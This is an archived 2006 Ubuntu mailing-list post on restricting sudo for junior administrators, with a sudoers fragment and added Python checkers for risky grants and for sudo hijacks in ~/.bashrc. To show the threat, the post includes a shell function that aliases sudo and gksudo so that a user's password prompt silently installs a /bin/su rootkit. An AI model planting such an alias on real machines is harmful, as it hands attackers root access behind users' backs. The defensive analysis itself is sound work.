Sudo even more secure

John Richard Moser nigelenki at comcast.net
Wed Mar 22 06:38:54 GMT 2006


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have looked into making a sudo group 'jradmin' that cannot run
apt/synaptic/dpkg or alter users.  Relevant lines are below:

----SNIP----
Cmnd_Alias      SU = /bin/su
Cmnd_Alias      SHELLS = /usr/bin/sh, /usr/bin/csh, /usr/bin/ksh, \
                        /usr/local/bin/tcsh, /usr/bin/rsh, \
                        /usr/local/bin/zsh

Cmnd_Alias      GNOME_ADMIN = /usr/bin/network-admin, \
                        /usr/bin/disks-admin, \
                        /usr/bin/services-admin, \
                        /usr/bin/gnome-software-properties, \
                        /usr/bin/time-admin, /usr/bin/shares-admin

Cmnd_Alias      GNOME_USERS_ADMIN = /usr/bin/users-admin

Cmnd_Alias      GPARTED = /usr/bin/gparted

Cmnd_Alias      APT = /usr/bin/apt-get, /usr/bin/synaptic, \
                        /usr/bin/dpkg

Cmnd_Alias      UPDATE = /usr/bin/update-manager

Cmnd_Alias      VISUDO = /usr/bin/visudo

# Members of the jradmin group have limited capabilities.
# They are prevented from doing stealth damage to escalate their
# privileges; they CAN massively destroy the system.
%jradmin        ALL=(ALL) PASSWD: GNOME_ADMIN, UPDATE
----SNIP----

It is also possible to include 'apt-get update' and 'apt-get upgrade' in
UPDATE.  Do NOT include anything that allows full user administration or
sudoers hacking, as this would lead to evasion.

If users-admin were modified to prevent changing who is in 'admin' given,
say, --jradmin, then junior administrators could still manage users, but
would not be able to elevate their own privileges.  Further, sudo may be
configurable (or patched to be configurable) to allow the seamless
replacement of 'users-admin' with 'users-admin --jradmin' for %jradmin.

Similarly, the synaptic-apt-dpkg stack could be modified to take
--jradmin to mean that ONLY signed packages could be used; ONLY the
repositories given can supply packages; repositories CANNOT be modified;
and the GPG keys CANNOT be changed.  This would allow for software
installation and removal without opening a hole re 'dpkg -i
baseutils_upgrade_with_rootkit.deb'.
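To check a sudoers fragment like the one above for exactly the evasion the post warns about, here is an added example in Python; it is not code from the post, from Ubuntu or from sudo. It expands the Cmnd_Aliases, works out what each %group may run, and flags anything in a deny list of commands that amount to root (su, shells, visudo, users-admin, the apt/synaptic/dpkg tools). The deny list, the abridged copy of the posted fragment, and the two constructed variants are assumptions made for the example, as is the --jradmin switch, which users-admin does not actually have. The pinned variant also shows a sudo feature that gets part of the way to what the post proposes patching in: when a command spec in sudoers carries arguments, sudo only matches that exact argv, so granting '/usr/bin/users-admin --jradmin' rather than '/usr/bin/users-admin' lets the group run only that invocation. The lint treats such pinned specs as safe and a wildcard argument ('/usr/bin/dpkg -i *') as not.

```python
import re

# Commands equivalent to unrestricted root when runnable via sudo
# (assumption for this example, seeded from the post's aliases).
ESCALATION_CMDS = {
    "/bin/su", "/usr/bin/sh", "/usr/bin/csh", "/usr/bin/ksh",
    "/usr/local/bin/tcsh", "/usr/bin/rsh", "/usr/local/bin/zsh",
    "/usr/bin/visudo", "/usr/bin/users-admin",
    "/usr/bin/apt-get", "/usr/bin/synaptic", "/usr/bin/dpkg",
}
ALIAS_RE = re.compile(r"Cmnd_Alias\s+(\w+)\s*=\s*(.*)")
# %group  host=(runas)  [PASSWD:|NOPASSWD:...]  cmd, cmd
GRANT_RE = re.compile(r"(%\S+)\s+[^\s=]+\s*=\s*(?:\([^)]*\)\s*)?"
                      r"(?:(?:NO)?(?:PASSWD|EXEC|SETENV):\s*)*(.*)")

def _logical_lines(text):
    """Yield non-comment lines with backslash continuations joined."""
    buf = ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        stripped, buf = (buf + line).strip(), ""
        if stripped and not stripped.startswith("#"):
            yield stripped

def _split_cmds(spec):
    """Split a comma list of command specs (a backslash-escaped comma is literal)."""
    return [c.strip().replace("\\,", ",")
            for c in re.split(r"(?<!\\),", spec) if c.strip()]

def parse_sudoers(text):
    """Return (aliases, grants): alias -> [spec], %group -> [spec]."""
    aliases, grants = {}, {}
    for line in _logical_lines(text):
        m = ALIAS_RE.match(line)
        if m:
            aliases[m.group(1)] = _split_cmds(m.group(2))
            continue
        m = GRANT_RE.match(line)
        if m:
            grants.setdefault(m.group(1), []).extend(_split_cmds(m.group(2)))
    return aliases, grants

def expand(entry, aliases, seen=None):
    """Recursively replace alias names with the specs they name."""
    if entry not in aliases:
        return [entry]
    seen = set() if seen is None else seen
    if entry in seen:  # alias cycle guard
        return []
    seen.add(entry)
    return [s for sub in aliases[entry] for s in expand(sub, aliases, seen)]

def escalation_paths(text):
    """Map each %group to the sorted escalation-capable commands it may run.

    Fixed arguments ('/usr/bin/apt-get upgrade') only match that exact argv
    in sudo, so they are not flagged; a bare path, a wildcard argument
    ('/usr/bin/dpkg -i *') and 'ALL' are.
    """
    aliases, grants = parse_sudoers(text)
    findings = {}
    for group, entries in grants.items():
        bad = set()
        for spec in (s for e in entries for s in expand(e, aliases)):
            if spec == "ALL":
                bad.add("ALL")
                continue
            path, *args = spec.split()
            pinned = bool(args) and not any(ch in a for a in args for ch in "*?[")
            if path in ESCALATION_CMDS and not pinned:
                bad.add(path)
        findings[group] = sorted(bad)
    return findings

# The post's fragment, abridged to the aliases the grant line uses plus APT.
POSTED = r"""
Cmnd_Alias      GNOME_ADMIN = /usr/bin/network-admin, \
                        /usr/bin/disks-admin, \
                        /usr/bin/services-admin, \
                        /usr/bin/gnome-software-properties, \
                        /usr/bin/time-admin, /usr/bin/shares-admin
Cmnd_Alias      GNOME_USERS_ADMIN = /usr/bin/users-admin
Cmnd_Alias      APT = /usr/bin/apt-get, /usr/bin/synaptic, \
                        /usr/bin/dpkg
Cmnd_Alias      UPDATE = /usr/bin/update-manager
# Members of the jradmin group have limited capabilities.
%jradmin        ALL=(ALL) PASSWD: GNOME_ADMIN, UPDATE
"""
# Constructed variants: one loosens the grant, one pins arguments.
LOOSENED = POSTED.replace("GNOME_ADMIN, UPDATE",
    "GNOME_ADMIN, UPDATE, /usr/bin/dpkg -i *, /usr/bin/apt-get install *")
PINNED = POSTED.replace("GNOME_ADMIN, UPDATE",
    "GNOME_ADMIN, UPDATE, /usr/bin/users-admin --jradmin, "
    "/usr/bin/apt-get update, /usr/bin/apt-get upgrade")
```

This handles only the sudoers subset the post uses (Cmnd_Alias, backslash continuations, one group spec per line); it is a lint, not a parser, and it does not replace 'visudo -c' for syntax or 'sudo -l -U user' for the effective grants on a live box. Exact-argument matching is only as good as the program behind it: pinning 'apt-get upgrade' does nothing if the junior admin can also edit the repository list or keyring, which is the hole the post's --jradmin idea is meant to close.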

With these two modifications, and with 'sudo' or 'gksudo' (really,
libsudo) able to replace commands to add switches like --jradmin, more
restricted sudo rights are possible, while users can still install,
remove, and update software and add new users.  This makes the system
more resilient against automated attacks such as TTY snoopers which
modify ~/.bashrc to sneak rootkits in:

# Install our secret /bin/su rootkit, gives root if --now-dammit is
# passed.  $1 is the wrapper (sudo or gksudo), $2 the command the user
# asked for, and the rest are that command's arguments.
install_root_kit() {
	wrapper=$1
	cmd=$2
	shift
	mdsu=`md5sum /bin/su | cut -f 1 -d ' '`
	mdrk=`md5sum ~/.root_kit/rk_su | cut -f 1 -d ' '`
	# Do it normally if root kit is installed
	if [ "${mdsu}" = "${mdrk}" ]; then
		"${wrapper}" "$@"
	else
		# Symlink named like the real command (so the prompt looks right)
		# pointing at the installer sitting next to it in ~/.root_kit
		ln -s silent_install_root_kit ~/.root_kit/"${cmd}"
		"${wrapper}" ~/.root_kit/"${cmd}"
		rm ~/.root_kit/"${cmd}"
		# gksudo only shows once, don't tip him off
		if [ "${wrapper}" != "gksudo" ]; then
			"${wrapper}" "$@"
		fi
	fi
}
alias sudo='install_root_kit sudo'
alias gksudo='install_root_kit gksudo'


The user would see:

bob at home$ sudo users-admin
Password:
Password:

* GTK-Warning: Drawing window...

OR perhaps:

========================================
| Password required to run users-admin |
| [                                   ]|
|______________________________________|

Not a single tip-off :)
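The attack above lives entirely in the user's shell: an alias makes 'sudo' run the attacker's function, which then asks sudo to run a binary under ~/.root_kit. As an added example (not code from the post), here is a Python scanner for rc-file text that looks for the three shell-level ways of intercepting sudo/gksudo: an alias on the name, a function with the name, and a PATH prefix the user can write to (a 'sudo' dropped in $HOME/.local/bin shadows /usr/bin/sudo just as well). The list of names to watch, the user-writable prefixes, and the sample ~/.bashrc are assumptions for the example; the two alias lines in the sample are the ones from the post.

```python
import re

# Privileged entry points whose shell-level shadowing is worth flagging
# (assumption for this example; extend to taste).
PRIV_CMDS = ("sudo", "gksudo", "sudoedit", "su", "pkexec")
_NAMES = "|".join(PRIV_CMDS)
ALIAS_RE = re.compile(r"^\s*alias\s+(%s)=(.*)$" % _NAMES)
FUNC_RE = re.compile(r"^\s*(?:function\s+(%s)\b|(%s)\s*\(\s*\))" % (_NAMES, _NAMES))
PATH_RE = re.compile(r"^\s*(?:export\s+)?PATH=(\S+)")
# PATH prefixes a user can write to: a binary named 'sudo' there shadows /usr/bin/sudo.
USER_WRITABLE = ("", ".", "~", "$HOME", "${HOME}", "/home/", "/tmp")

def scan_rc(text):
    """Return [(lineno, kind, detail)] for sudo/gksudo hijacks in rc-file text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]      # crude comment strip; adequate for rc files
        m = ALIAS_RE.match(code)
        if m:
            cmd, body = m.group(1), m.group(2).strip().strip("'\"").strip()
            if body != cmd:               # alias sudo='sudo ' is the benign idiom
                findings.append((n, "alias-shadow", cmd))
            continue
        m = FUNC_RE.match(code)
        if m:
            findings.append((n, "function-shadow", m.group(1) or m.group(2)))
            continue
        m = PATH_RE.match(code)
        if m:
            first = m.group(1).split(":")[0]
            if first in USER_WRITABLE or first.startswith(USER_WRITABLE[2:]):
                findings.append((n, "path-prepend", first))
    return findings

def shadowed_commands(text):
    """Names from PRIV_CMDS that an alias or function in this text would intercept."""
    return {d for _, kind, d in scan_rc(text) if kind.endswith("-shadow")}

# Constructed ~/.bashrc sample; the two install_root_kit alias lines are from the post.
SAMPLE_BASHRC = r"""
# ~/.bashrc (constructed sample for this example)
export PATH=$HOME/.local/bin:$PATH
alias ll='ls -l'
alias sudo='sudo '      # benign idiom: lets aliases expand after sudo
install_root_kit() {
    :
}
alias sudo='install_root_kit sudo'
alias gksudo='install_root_kit gksudo'
sudo() { command sudo "$@"; }
"""
```

In a live shell, 'type -a sudo' shows the same thing interactively (alias, then function, then each PATH hit), and 'command sudo' bypasses both an alias and a function, whereas '\sudo' only skips the alias; neither helps against a PATH-shadowed binary. None of this makes the shell trustworthy once ~/.bashrc is attacker-controlled; what limits the damage is the sudoers restriction the post describes, since 'sudo ~/.root_kit/users-admin' does not match any command granted to %jradmin and is refused.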

-- 
All content of all messages exchanged herein are left in the
Public Domain, unless otherwise explicitly stated.

    Creative brains are a valuable, limited resource. They shouldn't be
    wasted on re-inventing the wheel when there are so many fascinating
    new problems waiting out there.
                                                 -- Eric Steven Raymond

    We will enslave their women, eat their children and rape their
    cattle!
                                     -- Evil alien overlord from Blasto




More information about the ubuntu-devel mailing list